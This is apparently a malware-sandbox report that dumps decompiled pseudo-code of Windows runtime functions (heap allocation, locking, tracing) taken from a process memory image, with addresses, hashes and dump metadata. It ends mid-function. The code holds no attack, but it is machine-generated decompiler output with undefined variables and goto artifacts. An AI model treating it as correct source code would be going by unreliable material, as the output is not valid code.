                                                        0x04907632
                                                        0x04907635
                                                        0x04907639
                                                        0x04907640
                                                        0x0490766e
                                                        0x04907675
                                                        0x00000000
                                                        0x00000000
                                                        0x04907681
                                                        0x04907689
                                                        0x0490768d
                                                        0x04907691
                                                        0x04907695
                                                        0x04907699
                                                        0x049076af
                                                        0x049076b5
                                                        0x049076b7
                                                        0x049076b7
                                                        0x049076d7
                                                        0x049076dc
                                                        0x00000000
                                                        0x049076dc
                                                        0x049076a2
                                                        0x049076a9
                                                        0x04907651
                                                        0x04907653
                                                        0x04907653
                                                        0x04907656
                                                        0x04907656
                                                        0x00000000
                                                        0x04907656
                                                        0x04907644
                                                        0x04907646
                                                        0x04907648
                                                        0x04907648
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f09751ee5b25e822bc01e83e7884978f21d4458808a6b9722c025d46ee4e9f5e
                                                        • Instruction ID: 8f5de9ca70a8661d6b0f44ea99d863efe03eeebf457e2c9dff39fabdc2d910be
                                                        • Opcode Fuzzy Hash: f09751ee5b25e822bc01e83e7884978f21d4458808a6b9722c025d46ee4e9f5e
                                                        • Instruction Fuzzy Hash: 4F315A716057019FD320DF59C800B26B7E9EB88B14F058ABEE995E7391E7B0F804CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489AA16, Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E0489AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x498d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4987b9c; // 0x0
					_t53 = L048B4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E048DB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E048DF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L048A6C59(_t53, _t51, _t58) != 0) {
							_t28 = E048C5E50(0x487c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E048CB230(_v32, _v28, 0x487c2d8, 1,  &_v24);
								_t28 = E0489F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                        0x0489aa25
                                                        0x0489aa29
                                                        0x0489aa2d
                                                        0x0489aa30
                                                        0x0489aa37
                                                        0x0489aa3c
                                                        0x048f4458
                                                        0x048f4458
                                                        0x048f4472
                                                        0x048f4474
                                                        0x048f4476
                                                        0x0489aa64
                                                        0x0489aa74
                                                        0x048f447c
                                                        0x048f4483
                                                        0x048f4492
                                                        0x0489aa52
                                                        0x0489aa54
                                                        0x0489aa5e
                                                        0x048f44a8
                                                        0x048f44ad
                                                        0x048f44af
                                                        0x048f44b6
                                                        0x048f44b6
                                                        0x048f44b9
                                                        0x048f44bc
                                                        0x048f44cd
                                                        0x048f44d3
                                                        0x048f44d6
                                                        0x048f44e1
                                                        0x048f44e1
                                                        0x048f44e6
                                                        0x048f44e8
                                                        0x048f44fb
                                                        0x048f44fb
                                                        0x048f44e8
                                                        0x00000000
                                                        0x0489aa5e
                                                        0x048f4476
                                                        0x0489aa42
                                                        0x0489aa46
                                                        0x0489aa48
                                                        0x0489aa4c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f3d4615f904d09e950c53c4cd6a5a22be804d4fbf52b8bce59bf287aac8b180
                                                        • Instruction ID: 6efaf59dd80a34b5262ffe0e4dfc63af7abc661af73f6e60e00aac1786366f6b
                                                        • Opcode Fuzzy Hash: 0f3d4615f904d09e950c53c4cd6a5a22be804d4fbf52b8bce59bf287aac8b180
                                                        • Instruction Fuzzy Hash: A4310371A00619ABDF149F68CD41ABFB7B8EF04704F050A6AF901E7250E7B8BD50DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D8EC7, Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E048D8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x498d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E048C4E70(0x49886e4, 0x48d9490, 0, 0);
					if( *0x49853e8 > 5 && E048D8F33(0x49853e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x49853e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x49853e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x487bc46;
						_t48 = E04917B9C(0x49853e8, 0x487bc46, _t67, 0x49853e8, _t70,  &_v140);
					}
				}
				return E048DB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                        0x048d8ec7
                                                        0x048d8ed9
                                                        0x048d8edc
                                                        0x048d8ee6
                                                        0x048d8ee9
                                                        0x048d8eee
                                                        0x048d8efc
                                                        0x048d8f08
                                                        0x04911349
                                                        0x04911353
                                                        0x0491135d
                                                        0x04911366
                                                        0x0491136f
                                                        0x04911375
                                                        0x0491137c
                                                        0x04911385
                                                        0x04911390
                                                        0x04911391
                                                        0x0491139c
                                                        0x0491139d
                                                        0x049113a6
                                                        0x049113ac
                                                        0x049113b2
                                                        0x049113b5
                                                        0x049113bc
                                                        0x049113bf
                                                        0x049113c2
                                                        0x049113c5
                                                        0x049113c8
                                                        0x049113cb
                                                        0x049113ce
                                                        0x049113d1
                                                        0x049113d4
                                                        0x049113d7
                                                        0x049113da
                                                        0x049113dd
                                                        0x049113e0
                                                        0x049113e3
                                                        0x049113e6
                                                        0x049113e9
                                                        0x049113f6
                                                        0x04911400
                                                        0x04911400
                                                        0x048d8f08
                                                        0x048d8f32

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae7f5728fee527867935cff10481365c7f9c1f4fac2c44592316be0792b3c89a
                                                        • Instruction ID: 2fc9b7587a682b271ec16f16096935050840f9a4751af4ad6b53d8c3cc9b9be0
                                                        • Opcode Fuzzy Hash: ae7f5728fee527867935cff10481365c7f9c1f4fac2c44592316be0792b3c89a
                                                        • Instruction Fuzzy Hash: D941A2B1D013189ADB14DF9AD980AADFBF4FB48714F5041AEE519E7600D774AA44CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048D4A2C, Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E048D4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x498d360 ^ _t62;
				_v8 =  *0x498d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E048B2280(_t26, 0x4988608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E048AFFB0(_t41, _t51, 0x4988608);
						L2:
						 *0x498b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E048DB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E048B2280(_t28, 0x4988608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E048AFFB0(_t42, _t53, 0x4988608);
							if(_t53 != 0) {
								L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E048AFFB0(_t41, _t51, 0x4988608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                        0x048d4a2c
                                                        0x048d4a34
                                                        0x048d4a3c
                                                        0x048d4a3e
                                                        0x048d4a48
                                                        0x048d4a4b
                                                        0x048d4a4d
                                                        0x048d4a51
                                                        0x048d4a9c
                                                        0x00000000
                                                        0x00000000
                                                        0x048d4aa3
                                                        0x048d4aa8
                                                        0x048d4aad
                                                        0x048d4ab1
                                                        0x048d4ade
                                                        0x048d4ae3
                                                        0x048d4a5a
                                                        0x048d4a62
                                                        0x048d4a6a
                                                        0x048d4a6e
                                                        0x0490f203
                                                        0x048d4a84
                                                        0x048d4a88
                                                        0x048d4a89
                                                        0x048d4a8a
                                                        0x048d4a95
                                                        0x048d4a95
                                                        0x048d4a79
                                                        0x048d4a80
                                                        0x048d4af2
                                                        0x048d4af4
                                                        0x048d4af9
                                                        0x048d4aff
                                                        0x048d4b01
                                                        0x048d4b03
                                                        0x048d4b08
                                                        0x0490f20a
                                                        0x0490f212
                                                        0x0490f216
                                                        0x0490f216
                                                        0x048d4b08
                                                        0x048d4b13
                                                        0x048d4b1a
                                                        0x0490f229
                                                        0x0490f229
                                                        0x048d4b1a
                                                        0x048d4a82
                                                        0x00000000
                                                        0x048d4a82
                                                        0x048d4ab7
                                                        0x048d4acd
                                                        0x048d4acd
                                                        0x048d4ad5
                                                        0x048d4ada
                                                        0x00000000
                                                        0x048d4ada
                                                        0x048d4ac2
                                                        0x048d4acb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048d4acb
                                                        0x048d4a53
                                                        0x048d4a53
                                                        0x048d4a58
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22916af8442b096016fa52530155b402511795300293bb365c9acf2c74536a88
                                                        • Instruction ID: a4934c33e519238f7cc40e07f41c03964dcc89c1ee77eef85c56ae6c93c61675
                                                        • Opcode Fuzzy Hash: 22916af8442b096016fa52530155b402511795300293bb365c9acf2c74536a88
                                                        • Instruction Fuzzy Hash: 8631E1322062509FD721EE58C944B2ABBA5FFC5B14F404E29E956DB285DBB0F840CB96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CE730, Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 74%
                                                        			E048CE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E048D9670() < 0) {
					L048EDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x4987b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L048B4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M048CE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                        0x048ce730
                                                        0x048ce736
                                                        0x048ce738
                                                        0x048ce73d
                                                        0x048ce73e
                                                        0x048ce740
                                                        0x048ce749
                                                        0x048ce765
                                                        0x048ce76a
                                                        0x048ce76b
                                                        0x048ce76c
                                                        0x048ce76d
                                                        0x048ce76e
                                                        0x048ce76f
                                                        0x048ce775
                                                        0x048ce777
                                                        0x048ce77e
                                                        0x0490b675
                                                        0x048ce784
                                                        0x048ce784
                                                        0x048ce789
                                                        0x048ce7a8
                                                        0x048ce7ac
                                                        0x048ce807
                                                        0x048ce7ae
                                                        0x048ce7ae
                                                        0x048ce7b1
                                                        0x048ce7b4
                                                        0x048ce7b9
                                                        0x048ce7c0
                                                        0x048ce7c4
                                                        0x048ce7ca
                                                        0x048ce7cc
                                                        0x00000000
                                                        0x048ce7d3
                                                        0x048ce7d6
                                                        0x00000000
                                                        0x00000000
                                                        0x048ce7ff
                                                        0x048ce802
                                                        0x00000000
                                                        0x00000000
                                                        0x048ce7f9
                                                        0x048ce7fc
                                                        0x00000000
                                                        0x00000000
                                                        0x048ce7f3
                                                        0x048ce7f6
                                                        0x00000000
                                                        0x00000000
                                                        0x048ce7ed
                                                        0x048ce7f0
                                                        0x00000000
                                                        0x00000000
                                                        0x048ce7e7
                                                        0x048ce7ea
                                                        0x00000000
                                                        0x00000000
                                                        0x0490b685
                                                        0x0490b688
                                                        0x00000000
                                                        0x00000000
                                                        0x0490b682
                                                        0x00000000
                                                        0x00000000
                                                        0x048ce7cc
                                                        0x048ce7d9
                                                        0x048ce7dc
                                                        0x048ce7de
                                                        0x048ce7de
                                                        0x048ce7ac
                                                        0x048ce7e4
                                                        0x048ce74b
                                                        0x048ce751
                                                        0x048ce759
                                                        0x048ce761
                                                        0x048ce761

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 635a5fc575dad928fa1161d3d573ad6510008b99d5c9912ecd86c6e3b490e96e
                                                        • Instruction ID: b9404726da694680a02a4989d46bbccbf6b5efcab914ae92b13b116c66ba6f7a
                                                        • Opcode Fuzzy Hash: 635a5fc575dad928fa1161d3d573ad6510008b99d5c9912ecd86c6e3b490e96e
                                                        • Instruction Fuzzy Hash: 91318D75A54249EFE704CF58D841BAABBE8FB19314F14866AF904CB341E771ED80CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CBC2C, Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E048CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x4986100; // 0x16
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E048B2280(0xd, 0x16f9f1a0);
				_t41 =  *0x49860f8; // 0x0
				if(_t41 != 0) {
					 *0x49860f8 =  *_t41;
					 *0x49860fc =  *0x49860fc + 0xffff;
				}
				E048AFFB0(_t41, 0x800, 0x16f9f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x49860f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L048B4620(0x4986100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x4986100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                        0x048cbc36
                                                        0x048cbc42
                                                        0x048cbc45
                                                        0x048cbc4a
                                                        0x048cbd35
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048cbc50
                                                        0x048cbc50
                                                        0x048cbc58
                                                        0x048cbc5a
                                                        0x048cbc60
                                                        0x00000000
                                                        0x00000000
                                                        0x0490a4f2
                                                        0x0490a4f6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0490a4fc
                                                        0x048cbc79
                                                        0x048cbc7e
                                                        0x048cbc86
                                                        0x048cbd16
                                                        0x048cbd20
                                                        0x048cbd20
                                                        0x048cbc8d
                                                        0x048cbc94
                                                        0x048cbcbd
                                                        0x048cbcca
                                                        0x048cbccb
                                                        0x048cbccc
                                                        0x048cbccd
                                                        0x048cbcce
                                                        0x048cbcd4
                                                        0x048cbcea
                                                        0x048cbcee
                                                        0x048cbcf2
                                                        0x048cbd00
                                                        0x048cbd04
                                                        0x00000000
                                                        0x048cbc96
                                                        0x048cbcab
                                                        0x048cbcaf
                                                        0x048cbd2c
                                                        0x048cbd2c
                                                        0x048cbd09
                                                        0x00000000
                                                        0x048cbd09
                                                        0x048cbcb1
                                                        0x048cbcb5
                                                        0x048cbcbb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048cbcbb

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c54611f889701d1bcda084d5551be6655f89898e3979342643b6200c3f69fddf
                                                        • Instruction ID: c49fe4bf96cc2d7492741cffa9defb6da0b05c2f35a4b9da8f72425818938b9c
                                                        • Opcode Fuzzy Hash: c54611f889701d1bcda084d5551be6655f89898e3979342643b6200c3f69fddf
                                                        • Instruction Fuzzy Hash: 8431FD32A04A159FDB01EF9CE481BA677B4EB18314F004A7CEE44DF242EA78FD058B80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C1DB5, Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 60%
                                                        			E048C1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E048BF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L048B4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E048BF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                        0x048c1dc2
                                                        0x048c1dc5
                                                        0x048c1dc7
                                                        0x048c1dcc
                                                        0x048c1dce
                                                        0x048c1dd6
                                                        0x048c1ddf
                                                        0x048c1de0
                                                        0x048c1de1
                                                        0x048c1de5
                                                        0x048c1de8
                                                        0x048c1def
                                                        0x048c1df0
                                                        0x048c1df6
                                                        0x048c1df7
                                                        0x048c1dfe
                                                        0x048c1e1a
                                                        0x00000000
                                                        0x00000000
                                                        0x048c1e0b
                                                        0x048c1e12
                                                        0x048c1e12
                                                        0x048c1e00
                                                        0x048c1e00
                                                        0x048c1e05
                                                        0x048c1e1e
                                                        0x048c1e23
                                                        0x0490570f
                                                        0x04905713
                                                        0x00000000
                                                        0x00000000
                                                        0x04905719
                                                        0x04905719
                                                        0x048c1e2c
                                                        0x048c1e2d
                                                        0x048c1e2e
                                                        0x048c1e2f
                                                        0x048c1e31
                                                        0x048c1e32
                                                        0x048c1e35
                                                        0x048c1e3d
                                                        0x04905723
                                                        0x0490573d
                                                        0x0490573d
                                                        0x00000000
                                                        0x04905723
                                                        0x048c1e49
                                                        0x048c1e4e
                                                        0x048c1e4e
                                                        0x048c1e09
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                        • Instruction ID: e4a5978b0cc739d1fbe2ba1a3d3d91dd90893a5337d9e98ad0b97c62480ce068
                                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                        • Instruction Fuzzy Hash: 23218D32A00118FFD720CF59DC84EAABBBDEF85A54F114559E901D7211DA30FE01DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04899100, Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 76%
                                                        			E04899100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x496f6e8);
				E048ED0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E049688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E048ED130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x49886c0; // 0x2607b0
				if(_t88 == 0) {
					goto L4;
				}
